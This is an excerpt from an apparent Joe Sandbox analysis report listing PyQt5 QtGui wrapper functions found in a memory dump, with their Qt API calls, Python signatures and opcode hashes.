                                                                                                                                                                                                                                          • String ID: QTextTableFormat$alignment$alignment(self) -> Qt.Alignment
                                                                                                                                                                                                                                          • API String ID: 410347170-1208340909
                                                                                                                                                                                                                                          • Opcode ID: 6b17a99f599955371270d71f4ff11c23288da743570c381190cfa2d99d2ddf4b
                                                                                                                                                                                                                                          • Instruction ID: 47bb31a6957d55072af1ef37cb443d39c9ca69d8a16cfec9ace656a3818aeae3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b17a99f599955371270d71f4ff11c23288da743570c381190cfa2d99d2ddf4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29112377A09A46C5EB109F65E8896A933A4FB44FD0F918032DA8E07324EF3CE599C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toPoint@QVector2D@@QEBA?AVQPoint@@XZ.QT5GUI ref: 00007FF89D98BE68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point@Point@@Vector2malloc
                                                                                                                                                                                                                                          • String ID: QVector3D$toPoint$toPoint(self) -> QPoint
                                                                                                                                                                                                                                          • API String ID: 832002611-158562034
                                                                                                                                                                                                                                          • Opcode ID: cf5b0fe2694ab808fd060cb70a43f94e7cb16deb7aeffb7eb3e9e802f6783953
                                                                                                                                                                                                                                          • Instruction ID: de780554035eb0b466e7094ee1f7ba0b05e6018050582c51f8d8cf6ba73c3fde
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf5b0fe2694ab808fd060cb70a43f94e7cb16deb7aeffb7eb3e9e802f6783953
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11F777A08A4681EB109F65E84A6A933A4FB44FD4F918032CA9E07320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?window@QPainter@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D999A68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?window@Painter@@Rect@@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$window$window(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 83040069-2596992568
                                                                                                                                                                                                                                          • Opcode ID: d8bbe2d7eaf7efd1a49bdc1c98b93d1dbf27503f3511cc9cfe91f2d5abf30646
                                                                                                                                                                                                                                          • Instruction ID: 58e7bbca424a0d0dbfd702086db0dc55fdd7a743a071c223e6af3e3804ed7c42
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8bbe2d7eaf7efd1a49bdc1c98b93d1dbf27503f3511cc9cfe91f2d5abf30646
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05110977A09A4692EB109F65E84A6A933E4FB44FD0F918032C98E07320EF7DF559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?sizeIncrement@QWindow@@QEBA?AVQSize@@XZ.QT5GUI ref: 00007FF89D963E68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?sizeIncrement@Size@@Window@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$sizeIncrement$sizeIncrement(self) -> QSize
                                                                                                                                                                                                                                          • API String ID: 2710399533-4120804601
                                                                                                                                                                                                                                          • Opcode ID: b7dd395e7bdabe8ac9de9d923dc2654eb6ee84adc161714de803ff5b3cd8b1fb
                                                                                                                                                                                                                                          • Instruction ID: 4760bdf9c6680a5e2be528cf995719bc2f2222f042385f88fca8c4889a3d6f96
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7dd395e7bdabe8ac9de9d923dc2654eb6ee84adc161714de803ff5b3cd8b1fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13110977A08A4681EB10DF65E8496A933A4FB44FD0F918032D99E07324EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toBlockFormat@QTextFormat@@QEBA?AVQTextBlockFormat@@XZ.QT5GUI ref: 00007FF89D9A7EA8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFormat@@Text$Format@malloc
                                                                                                                                                                                                                                          • String ID: QTextFormat$toTableFormat$toTableFormat(self) -> QTextTableFormat
                                                                                                                                                                                                                                          • API String ID: 2120409781-1785544545
                                                                                                                                                                                                                                          • Opcode ID: 913d73b3f5b7ab7159e1768e870c25f500cd697764dc8db108c4fde8e34c98e8
                                                                                                                                                                                                                                          • Instruction ID: 20bfedd0ff02946dc79753c51cd37a80fb3edbaa0493aa4dcf4eb1df24ec0444
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 913d73b3f5b7ab7159e1768e870c25f500cd697764dc8db108c4fde8e34c98e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C110977A09A46D5EB10DF61E8496A933A4FB84FD0F918032C98E47320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toVector4D@QQuaternion@@QEBA?AVQVector4D@@XZ.QT5GUI ref: 00007FF89D9B7DD8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Vector4$Quaternion@@malloc
                                                                                                                                                                                                                                          • String ID: QQuaternion$toVector4D$toVector4D(self) -> QVector4D
                                                                                                                                                                                                                                          • API String ID: 60858153-2429867219
                                                                                                                                                                                                                                          • Opcode ID: 2e5fc8b902fac53a5947883f5c6bd8981848c93e174ec2e683d69e50287e75be
                                                                                                                                                                                                                                          • Instruction ID: e84c580df0abb7d5aa11940e9943fbbf1f3f26e1d9db5fdb71155be547829a20
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e5fc8b902fac53a5947883f5c6bd8981848c93e174ec2e683d69e50287e75be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D112737A08A8A81EB109F61E8497A923A4FB44FD4F914032C98E07324EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?begin@QTextDocument@@QEBA?AVQTextBlock@@XZ.QT5GUI ref: 00007FF89D953DE8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?begin@Block@@Document@@malloc
                                                                                                                                                                                                                                          • String ID: QTextDocument$firstBlock$firstBlock(self) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 3633996433-1044901945
                                                                                                                                                                                                                                          • Opcode ID: 0947b39f9ac7d9423658aeb75049a248dc0499bc80ee799f4ee26d359474ce3c
                                                                                                                                                                                                                                          • Instruction ID: 5a1bff467271eb8dca60ec399b43ce46924f32df495eda13fb6d6194dd6c2c76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0947b39f9ac7d9423658aeb75049a248dc0499bc80ee799f4ee26d359474ce3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E110977A09A4691EB109F61E8496A933A4FB44FD0F918032DA8E07320EF7DE559C784
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?transposed@QTransform@@QEBA?AV1@XZ.QT5GUI ref: 00007FF89D94BDE8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?transposed@Transform@@malloc
                                                                                                                                                                                                                                          • String ID: QTransform$transposed$transposed(self) -> QTransform
                                                                                                                                                                                                                                          • API String ID: 3469671558-3257874579
                                                                                                                                                                                                                                          • Opcode ID: d8f998b94befb08852833aad3b6efcff0d41ddda4679821d2a6a78257af7523f
                                                                                                                                                                                                                                          • Instruction ID: 9de30d6c3af4a50b5e497dada8cce8d15cd1b46b3a0550a4829714d40c5f64a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8f998b94befb08852833aad3b6efcff0d41ddda4679821d2a6a78257af7523f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0112737A08A46D1EB109F25E8496A923E5FB44FD4F918032DA8E07320EF7CE559C784
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?text@QStandardItem@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D9A5D68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?text@Item@@StandardString@@malloc
                                                                                                                                                                                                                                          • String ID: QStandardItem$text$text(self) -> str
                                                                                                                                                                                                                                          • API String ID: 1260637159-1680800330
                                                                                                                                                                                                                                          • Opcode ID: d21aad3598a7945a0862351a5ac370f1fa86e5a35d53d4f8aa12b7b68293fbcd
                                                                                                                                                                                                                                          • Instruction ID: 2c08678662ce7e3a5cce42a7b687c099f9be67cf7e970c12f45153aae61636a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d21aad3598a7945a0862351a5ac370f1fa86e5a35d53d4f8aa12b7b68293fbcd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87113977A08A4686EB109F61E84A6A933A4FB44FD4F918032CA9E07320EF7CF559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?model@QScreen@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D96DD68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?model@Screen@@String@@malloc
                                                                                                                                                                                                                                          • String ID: QScreen$model$model(self) -> str
                                                                                                                                                                                                                                          • API String ID: 2207564037-863610309
                                                                                                                                                                                                                                          • Opcode ID: 81da2ba902baf83cd564ba8ff2846d9de7b5459ca3e98b7db3a6b30ea1310085
                                                                                                                                                                                                                                          • Instruction ID: 77a6eefd50ac0440223edfff2197874ec6681717f2df422e2076e6a3a5d79e6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81da2ba902baf83cd564ba8ff2846d9de7b5459ca3e98b7db3a6b30ea1310085
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C110977A08A46C2EB109F65E8496A933A5FB44FD0F918036D99E07320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?font@QStandardItem@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FF89D9A7DB8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?font@Font@@Item@@Standardmalloc
                                                                                                                                                                                                                                          • String ID: QStandardItem$font$font(self) -> QFont
                                                                                                                                                                                                                                          • API String ID: 2316968117-444833792
                                                                                                                                                                                                                                          • Opcode ID: 593c3eb07f3ca0f767e380fb78c19cdf4cbfa5bbe237f6c2092a65f440379f57
                                                                                                                                                                                                                                          • Instruction ID: c4ba0b67c089f47360d34dbc7af1595e7473fbea246d94d2cdcb805caf3ef5de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 593c3eb07f3ca0f767e380fb78c19cdf4cbfa5bbe237f6c2092a65f440379f57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75110C77A09A4681EB10DF55E84A6A933A4FB54FD4F918032C98E07320EF7DF559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toPolygon@QPolygonF@@QEBA?AVQPolygon@@XZ.QT5GUI ref: 00007FF89D9C1DC8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PolygonPolygon@Polygon@@malloc
                                                                                                                                                                                                                                          • String ID: QPolygonF$toPolygon$toPolygon(self) -> QPolygon
                                                                                                                                                                                                                                          • API String ID: 4066872695-3446321353
                                                                                                                                                                                                                                          • Opcode ID: 5bfca227ca6124d6a6cd6e7e589d5e8f7523e8f223d25d67ce18dfe0ac54e101
                                                                                                                                                                                                                                          • Instruction ID: 050a0a83a02e02aafc399644a8eb60741b367f1e74f80d3edf60d655c44ea3d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bfca227ca6124d6a6cd6e7e589d5e8f7523e8f223d25d67ce18dfe0ac54e101
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7011FA37A08A4681EB109F65E8897A933A4FF44FD4F918036C99E07320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?formats@QTextLayout@@QEBA?AV?$QVector@UFormatRange@QTextLayout@@@@XZ.QT5GUI ref: 00007FF89D957DC8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?formats@FormatLayout@@Layout@@@@Range@Vector@malloc
                                                                                                                                                                                                                                          • String ID: QTextLayout$formats$formats(self) -> List[QTextLayout.FormatRange]
                                                                                                                                                                                                                                          • API String ID: 1343035234-1866568316
                                                                                                                                                                                                                                          • Opcode ID: dc867ee4bd6c01c6aa1c413fa048b15794d11de1febfab2b0f79b9e811bbba93
                                                                                                                                                                                                                                          • Instruction ID: cc4650f3923f5c553abef2db8a6f8c79e421f9742ad42dede9d18b175c1111bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc867ee4bd6c01c6aa1c413fa048b15794d11de1febfab2b0f79b9e811bbba93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C113577A09A86C1EB109F61E8496A933A4FB44FD4F918032DA9E07320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?blockFormat@QTextCursor@@QEBA?AVQTextBlockFormat@@XZ.QT5GUI ref: 00007FF89D95FDC8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?blockBlockCursor@@Format@Format@@malloc
                                                                                                                                                                                                                                          • String ID: QTextCursor$blockFormat$blockFormat(self) -> QTextBlockFormat
                                                                                                                                                                                                                                          • API String ID: 3771012401-2836192656
                                                                                                                                                                                                                                          • Opcode ID: 8e2658cb27280373c0a47f28b723d12042dfea57fb329d5e926df48e3b51df04
                                                                                                                                                                                                                                          • Instruction ID: 10a1b368f0a573d6c91cac908bea84a4d64d4ffcc56bd6063c6917e0e37f84f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e2658cb27280373c0a47f28b723d12042dfea57fb329d5e926df48e3b51df04
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73110977A09A46C1EB109F61E8496A933A4FB44FD0F918032DA9E47360EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setOrientation@QPageLayout@@QEAAXW4Orientation@1@@Z.QT5GUI ref: 00007FF89D935DA2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setLayout@@Orientation@Orientation@1@@Page
                                                                                                                                                                                                                                          • String ID: QPageLayout$setOrientation$setOrientation(self, orientation: QPageLayout.Orientation)
                                                                                                                                                                                                                                          • API String ID: 1891949463-4195498082
                                                                                                                                                                                                                                          • Opcode ID: 94cc247d95ab0d99e3e61a93644cd534388f67ec895da9e83a2a9a2024e09f18
                                                                                                                                                                                                                                          • Instruction ID: a681ed17cc378f38f1843c4dd6aded62db8983a0bd27f756a753d4e115e36da4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94cc247d95ab0d99e3e61a93644cd534388f67ec895da9e83a2a9a2024e09f18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D11D276A18E46C1EB20DF10E8896A933A5FB48B84F914132DA9E07320EF39E55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setRestartHint@QSessionManager@@QEAAXW4RestartHint@1@@Z.QT5GUI ref: 00007FF89D962102
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Restart$?setHint@Hint@1@@Manager@@Session
                                                                                                                                                                                                                                          • String ID: QSessionManager$setRestartHint$setRestartHint(self, a0: QSessionManager.RestartHint)
                                                                                                                                                                                                                                          • API String ID: 116914812-3553406877
                                                                                                                                                                                                                                          • Opcode ID: 61ec945707baf50667884b72e0819d42711cd8f7ddeeb2d108b6efda1171252d
                                                                                                                                                                                                                                          • Instruction ID: c834d4fcd330e34a88934503b5a083356fb58a4fd08fbd132e15504264f8e989
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61ec945707baf50667884b72e0819d42711cd8f7ddeeb2d108b6efda1171252d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9111376A08F46C1EB20DF11E8896A933A5FB48BC4F914132DA8E43320EF3DE55AC304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setLayout@@PageUnit@1@@Units@
                                                                                                                                                                                                                                          • String ID: QPageLayout$setUnits$setUnits(self, units: QPageLayout.Unit)
                                                                                                                                                                                                                                          • API String ID: 1042583433-137683106
                                                                                                                                                                                                                                          • Opcode ID: dfa0fce72dddb0af0898693fa3293f97fcaa99e05d6d94df8e6db741c39dec2e
                                                                                                                                                                                                                                          • Instruction ID: c1a9a8f663feb201f124d25b3b99f89bb1efec0686607b153ae7d9ddbb9e4207
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfa0fce72dddb0af0898693fa3293f97fcaa99e05d6d94df8e6db741c39dec2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE11E676A18E46D1EB20DF11E8896A933B5FB48FC4F914132DA9E03320EF39E55AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mode@$?setBackgroundPainter@@Qt@@@
                                                                                                                                                                                                                                          • String ID: QPainter$setBackgroundMode$setBackgroundMode(self, mode: Qt.BGMode)
                                                                                                                                                                                                                                          • API String ID: 133799183-3218199416
                                                                                                                                                                                                                                          • Opcode ID: 36e5d5816767f90e3353b4ed716429493aa8692f3ff2f6e41f4ff677501b7c3b
                                                                                                                                                                                                                                          • Instruction ID: 221a11e15b1de5dead7d96d8ce88bfe9211315d6bda8f9610c15431bf2f137de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36e5d5816767f90e3353b4ed716429493aa8692f3ff2f6e41f4ff677501b7c3b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE11E676A18F46C1EB20CF15E8896A933A5FB48F94F914132DA9E03320EF3DE559C708
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?numberPrefix@QTextListFormat@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D97C0E8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?numberFormat@@ListPrefix@String@@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextListFormat$numberPrefix$numberPrefix(self) -> str
                                                                                                                                                                                                                                          • API String ID: 3887568297-2020782398
                                                                                                                                                                                                                                          • Opcode ID: 7285e651dd2b910952784e26df1bf148de4cbeabc2c7bda41787016fefe3b8b6
                                                                                                                                                                                                                                          • Instruction ID: 2ff5f75bf04b3b888e5c5508cfc8763c28e414426be16ac962a5dddf22f44445
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7285e651dd2b910952784e26df1bf148de4cbeabc2c7bda41787016fefe3b8b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29113937A08A4685EB109F21E84A6A933E4FB44FD0F918032C98E07320EF7CE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDeviceDevice@@TouchType@Type@1@@
                                                                                                                                                                                                                                          • String ID: QTouchDevice$setType$setType(self, devType: QTouchDevice.DeviceType)
                                                                                                                                                                                                                                          • API String ID: 3736315891-2165394557
